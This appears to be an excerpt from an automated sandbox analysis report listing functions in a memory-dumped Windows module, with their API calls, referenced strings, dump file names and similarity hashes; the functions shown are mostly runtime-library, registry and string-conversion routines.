Instruction Fuzzy Hash: ACB18EB8901619DFDB20DBB4C858F9AB7B4AF49B04F2444DAE8099B340E735EE45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E49E1, Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4E4A50
_free.LIBCMT ref: 6E4E4A5E
_free.LIBCMT ref: 6E4E4B8C
_free.LIBCMT ref: 6E4E4B97

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2330e4e7f902e50aa7d818dceef7211b750893ee25ba6eac16604aff2300d7f8
Instruction ID: ebf2b888ed3a0f57b69d91f80058e6d6661295ce2e8b242cdd29af6ee7b6cbc9
Opcode Fuzzy Hash: 2330e4e7f902e50aa7d818dceef7211b750893ee25ba6eac16604aff2300d7f8
Instruction Fuzzy Hash: E961CE72D04605AFDB10CFB8C840F9ABBF9FB45761F2045ABE954EB781E77099428B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C3DA0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E4B0000,?,00000104), ref: 6E4C3E7D
GetModuleHandleW.KERNEL32(00000000), ref: 6E4C3EF7

Strings

APPID, xrefs: 6E4C3E3D
Module, xrefs: 6E4C3FA2
REGISTRY, xrefs: 6E4C4030
Module_Raw, xrefs: 6E4C3FD3

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 8ff2689982f2156e134ac7745be6821f7e0a856a2a278bb5662dbc1df78b32a3
Instruction ID: 829e2f747a2a9bd90bb02f1036739dd7cc5a2bea2683085b179fd764f920ec03
Opcode Fuzzy Hash: 8ff2689982f2156e134ac7745be6821f7e0a856a2a278bb5662dbc1df78b32a3
Instruction Fuzzy Hash: 2371E7399002198BDB64DFB4CC94FEA7378AF85B14F0105EED80AAB680DB755E45CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C03B0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E4B0000,?,00000104), ref: 6E4C048D
GetModuleHandleW.KERNEL32(00000000), ref: 6E4C0507

Strings

APPID, xrefs: 6E4C044D
Module, xrefs: 6E4C05B2
REGISTRY, xrefs: 6E4C063D
Module_Raw, xrefs: 6E4C05DF

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 383ec33f460ba3888b21f776bb3d58233ca69144634af58ed5ea2f76712301db
Instruction ID: ead0d1d36b47c39cbfb5cd8684c8270c3bc3272b8577954fcc4bf5d88b760a17
Opcode Fuzzy Hash: 383ec33f460ba3888b21f776bb3d58233ca69144634af58ed5ea2f76712301db
Instruction Fuzzy Hash: 6E61B7799002198BDB64CFB0CC50FDE7378AF85B14F4005AED90AA7640EB755E45CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DFABC, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E4E024E,?,?,?,?,?), ref: 6E4DFAFE
__fassign.LIBCMT ref: 6E4DFB80
__fassign.LIBCMT ref: 6E4DFB9F
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6E4DFBCC
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6E4E024E), ref: 6E4DFBEB
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6E4E024E), ref: 6E4DFC24

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6968fcec16408374fed10b7c21275824175e32f1968fa39400cf47555f76270f
Instruction ID: 8c9dd6dbca2407a20ae643b2cf0ef35799b1e1f2d85ee0fe1f8807dc59048641
Opcode Fuzzy Hash: 6968fcec16408374fed10b7c21275824175e32f1968fa39400cf47555f76270f
Instruction Fuzzy Hash: 0E519D709052499FDB20CFB8D8A4AEEBBF8FF09700F24451BE955E7251D730AA55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C8680, Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,49F8414E,?,00000000,?,00000000,8007000E), ref: 6E4C86F3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E4C872A

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 29a40a281b7eb56018482a512d6c747a5766c350a3dac908ca4aa473801dbfef
Instruction ID: 60a4ce51cb4149c10ad1f327ddc755cbbf9235a18bb2d40b36845ae1f59cd30e
Opcode Fuzzy Hash: 29a40a281b7eb56018482a512d6c747a5766c350a3dac908ca4aa473801dbfef
Instruction Fuzzy Hash: 1A31F879700649ABD7109FB49C05FAAB7A8EB44F54F10452EF905E7380E775B50086A6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C3380, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6E4C3410
GetWindowLongW.USER32(?,000000FC), ref: 6E4C3424
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6E4C343A
GetWindowLongW.USER32(?,000000FC), ref: 6E4C3453
SetWindowLongW.USER32 ref: 6E4C3462

Strings

$, xrefs: 6E4C33C4

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 388cf048c68420376cc04b1dd6f2382b8e276b6825f3c0c5ef8f273b87851cce
Instruction ID: a6c6b136d118dfe076b77b8ba710eb2f18948c672f343c8c05a0f669ecfef0fd
Opcode Fuzzy Hash: 388cf048c68420376cc04b1dd6f2382b8e276b6825f3c0c5ef8f273b87851cce
Instruction Fuzzy Hash: 7A414A75900709AFCB21DFA9D848A9EBBF5FF48710F10865EE856A7260C731A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BE440, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,49F8414E), ref: 6E4BE494
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6E4BE4AB
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,49F8414E), ref: 6E4BE4E0
RegCloseKey.ADVAPI32(00000000), ref: 6E4BE4F3

Strings

Advapi32.dll, xrefs: 6E4BE48F
RegOpenKeyTransactedW, xrefs: 6E4BE4A5

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: 95c37142bf68f5dcd244e2986d346a5220678ef476c04161e75e46181d03e61f
Instruction ID: 2149317a6b83a2c476fe81547a614e1642f8a579b5e4a7c8c2024834c5861a2d
Opcode Fuzzy Hash: 95c37142bf68f5dcd244e2986d346a5220678ef476c04161e75e46181d03e61f
Instruction Fuzzy Hash: D1317871A04609EFDB24CFB6C984F6BB7B9EB85710F10856AF915DB344D774A900CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B8BF0, Relevance: 10.6, APIs: 7, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E4B8C21
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E4B8C2F
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E4B8C44
SysFreeString.OLEAUT32(00000000), ref: 6E4B8C4F
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6E4B8C76
SysFreeString.OLEAUT32(00000000), ref: 6E4B8C83
SysFreeString.OLEAUT32 ref: 6E4B8CB2

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: 905518db7ef4202c927812a52271ec2ab3fe6968800af18f505e76533495ffba
Instruction ID: efdf9365842522cfccb5d463866d4ff7de525bf89631f266603de9004fb2e45f
Opcode Fuzzy Hash: 905518db7ef4202c927812a52271ec2ab3fe6968800af18f505e76533495ffba
Instruction Fuzzy Hash: B7113A71641716BFCB216FB49C49F9E7B74EF46B20F10016AFA11AB2C0CB706904C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DDFA3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 6E4DE00D
api-ms-, xrefs: 6E4DDFF9

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 3718ad9cbf7914523c99657d95fcd63cf7e3a917e215ad1855537297c57e020b
Instruction ID: 2dd25dc25c55568a7e4e6ab807f63616600a024da7924f30d31d0ab8e4974092
Opcode Fuzzy Hash: 3718ad9cbf7914523c99657d95fcd63cf7e3a917e215ad1855537297c57e020b
Instruction Fuzzy Hash: CE210831E4163AEBCB735AB98CE0F5BB7689F42760F110217ED15A7382D671E809C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B21F0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B221D

Part of subcall function 6E4C94A7: RaiseException.KERNEL32(?,?,6E4C6476,000000FF,00000000,00000000,FFFFFFFF,?,?,?,?,6E4C6476,000000FF,6E4FCD2C,?,000000FF), ref: 6E4C9507

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B2262
___std_exception_copy.LIBVCRUNTIME ref: 6E4B228F

Strings

ios_base::badbit set, xrefs: 6E4B2227, 6E4B2252, 6E4B2273
ios_base::eofbit set, xrefs: 6E4B2236
ios_base::failbit set, xrefs: 6E4B2135, 6E4B2231

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3941765731-1866435925
Opcode ID: 4284c2490bf54d2b8922ff91ceb54bf56200a5b0f5b9669945899f68b8e88655
Instruction ID: 62b06b8d8d24ebd271fe1508750735d392b79ebf6cbd775f9e33aa972303c146
Opcode Fuzzy Hash: 4284c2490bf54d2b8922ff91ceb54bf56200a5b0f5b9669945899f68b8e88655
Instruction Fuzzy Hash: A211D5B29103056FC710CEF9D801FC6B3DCAF59610F04892BFA64DB640EB71A5158BE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E4EB6, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E4E4BFD: _free.LIBCMT ref: 6E4E4C26

_free.LIBCMT ref: 6E4E4F04

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4E4F0F
_free.LIBCMT ref: 6E4E4F1A
_free.LIBCMT ref: 6E4E4F6E
_free.LIBCMT ref: 6E4E4F79
_free.LIBCMT ref: 6E4E4F84
_free.LIBCMT ref: 6E4E4F8F

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction ID: 19b1b765133a2b6bf396f504fba26fd2412349faa529b9e62fd85f09d430a553
Opcode Fuzzy Hash: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction Fuzzy Hash: 64115E71960B08BED620ABF0CC15FCB779CAF0174AF400C2FA29EE6451DB75F50A86A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D6A30, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E4D69E1,6E4D69A9), ref: 6E4D6A50
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E4D6A63
FreeLibrary.KERNEL32(00000000,?,?,?,6E4D69E1,6E4D69A9), ref: 6E4D6A86

Strings

;\Ln, xrefs: 6E4D6A74
CorExitProcess, xrefs: 6E4D6A5B
mscoree.dll, xrefs: 6E4D6A49

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: ;\Ln$CorExitProcess$mscoree.dll
API String ID: 4061214504-2813587842
Opcode ID: 2a8914b4d9d2d2bc19ffcc131e4bd71dd0b7058ed5e7ed87dbe50961faa21e90
Instruction ID: fb5b0b5257eaa2cad533ab63830d7e9119a96ef5e3415d94588253f600e80fe0
Opcode Fuzzy Hash: 2a8914b4d9d2d2bc19ffcc131e4bd71dd0b7058ed5e7ed87dbe50961faa21e90
Instruction Fuzzy Hash: 2EF0A430501708BBCF11AFB4D818FEEBFB8EF05611F0141A5E809A6351CB305945CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BEEB0, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,49F8414E,00000000,00000000), ref: 6E4BEEEE
CharNextW.USER32(00000000,?,?,00000000), ref: 6E4BEF1B
CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E4BEF34
CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E4BEF3F
CharNextW.USER32(00000001,?,?,00000000), ref: 6E4BEFAE

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 90d83e89b8f620ecd18f9b5a7e7061527a77beab191d40a3308ef226a39ecffe
Instruction ID: 9edde1a37abcac5f55624d204641e7136616991bc2be6654171e8484c858a9b8
Opcode Fuzzy Hash: 90d83e89b8f620ecd18f9b5a7e7061527a77beab191d40a3308ef226a39ecffe
Instruction Fuzzy Hash: 0141FB39A1411ADFCB10DFB9D880969B7F2EFC9311F6144A7E449C7358E7719942C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B4460, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4B44A9
std::_Lockit::_Lockit.LIBCPMT ref: 6E4B44CB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B44EB
__Getctype.LIBCPMT ref: 6E4B4587
std::_Facet_Register.LIBCPMT ref: 6E4B45A6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B45C6

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 2f014ccb264958143546f7653842fa2993352a5a9829f976e3cab554c34127c2
Instruction ID: eabf5acada195ae1755acc6a4a45e7ad6618454f43970e32b1bde8e55d5cdfe5
Opcode Fuzzy Hash: 2f014ccb264958143546f7653842fa2993352a5a9829f976e3cab554c34127c2
Instruction Fuzzy Hash: A151C175D046048FCB10CFA8C440E9EB7B8EB45B54F11456FD909AB381EB30EA46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BE530, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E4BE440: GetModuleHandleW.KERNEL32(Advapi32.dll,49F8414E), ref: 6E4BE494
Part of subcall function 6E4BE440: RegCloseKey.ADVAPI32(00000000), ref: 6E4BE4F3

RegCloseKey.ADVAPI32(?,?,?), ref: 6E4BE592
RegEnumKeyExW.ADVAPI32 ref: 6E4BE5DA
RegEnumKeyExW.ADVAPI32 ref: 6E4BE613
RegCloseKey.ADVAPI32(?), ref: 6E4BE628
RegCloseKey.ADVAPI32(?), ref: 6E4BE650
RegCloseKey.ADVAPI32(?), ref: 6E4BE678

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: 5005c32bc91dd442189a4a5ec41595220e6b8283d74bd73b102eea0e30f3baef
Instruction ID: d1488bedbb4f48c357a66d412163a36099b9bec9f77e15677eb143d0da1fb9f8
Opcode Fuzzy Hash: 5005c32bc91dd442189a4a5ec41595220e6b8283d74bd73b102eea0e30f3baef
Instruction Fuzzy Hash: E1413C722043059BD724DFA5D894FABB7E8EBC8354F40496EF999D7240DB31E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4CB2A1, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E4C92CF,6E4C4EA0,6E4C5531,?,6E4C574E,?,00000001,?,?,00000001,?,6E4FCC28,0000000C,6E4C5842), ref: 6E4CB2AF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E4CB2BD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E4CB2D6
SetLastError.KERNEL32(00000000,6E4C574E,?,00000001,?,?,00000001,?,6E4FCC28,0000000C,6E4C5842,?,00000001,?), ref: 6E4CB328

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 65d6d8f2c59113a162b974bd59c8dcfa5d39390f6429eb341d34f920fb5935e4
Instruction ID: d03e85962b14682484ef819ad18c581b39a4cc9a2993b5cc37417fdb59173460
Opcode Fuzzy Hash: 65d6d8f2c59113a162b974bd59c8dcfa5d39390f6429eb341d34f920fb5935e4
Instruction Fuzzy Hash: AF01283A11DB125FE76025F57C94E6A2758EB43E79B200A2FE6244B7F8FF5188128186

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B91C0, Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E4B9563
_com_issue_error.COMSUPP ref: 6E4B956D
_com_issue_error.COMSUPP ref: 6E4B9577
_com_issue_error.COMSUPP ref: 6E4B957D
_com_issue_error.COMSUPP ref: 6E4B9587
_com_issue_error.COMSUPP ref: 6E4B9591

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error
String ID:
API String ID: 2162355165-0
Opcode ID: f2920c8541703dd0553c4fbdd221b2e0a96704de7a2b110ca1728af1c6b03f3b
Instruction ID: 501804136200c44c8105e71cac2d6e3300df96488fb4de8b80a30940bc0c6885
Opcode Fuzzy Hash: f2920c8541703dd0553c4fbdd221b2e0a96704de7a2b110ca1728af1c6b03f3b
Instruction Fuzzy Hash: 0CF096F960018DAEE7019FF59800F9B77ACEB44A18F10052EAE1477244C7303500C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C1390, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6E4BBC70: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,49F8414E,00000000,?), ref: 6E4BBCDE

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6E4C13E7
PdhRemoveCounter.PDH(?,?,00000000), ref: 6E4C1483
PdhCloseQuery.PDH(?,?,00000000), ref: 6E4C1498

Strings

0, xrefs: 6E4C1547
edit, xrefs: 6E4C13E0

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: 3b5d95bccbdca90cac92b45cc71c1f985010bfd9aa45a14b479bc01a954939b2
Instruction ID: 566ae36f940f82b83a1fbf02decabbbfef38bacfab55b92ae843fa17fe2dc77a
Opcode Fuzzy Hash: 3b5d95bccbdca90cac92b45cc71c1f985010bfd9aa45a14b479bc01a954939b2
Instruction Fuzzy Hash: 8DA1FF756003058BD704DFB8C890F9AB7B5BF85758F104A1EE9958B391D732E988CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DD00E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4DD196

Strings

., xrefs: 6E4DD39F
*?, xrefs: 6E4DD04F

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction ID: 2d9f1affd9c415a9ea73942e35258f024b7c1cbfd4661e45a4d9f799c7af0e60
Opcode Fuzzy Hash: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction Fuzzy Hash: 61614976E00209AFDB05CFE8C8908EDFBF9EF48314B2446AAD845E7304D771AA458F90

Uniqueness

Uniqueness Score: -1.00%

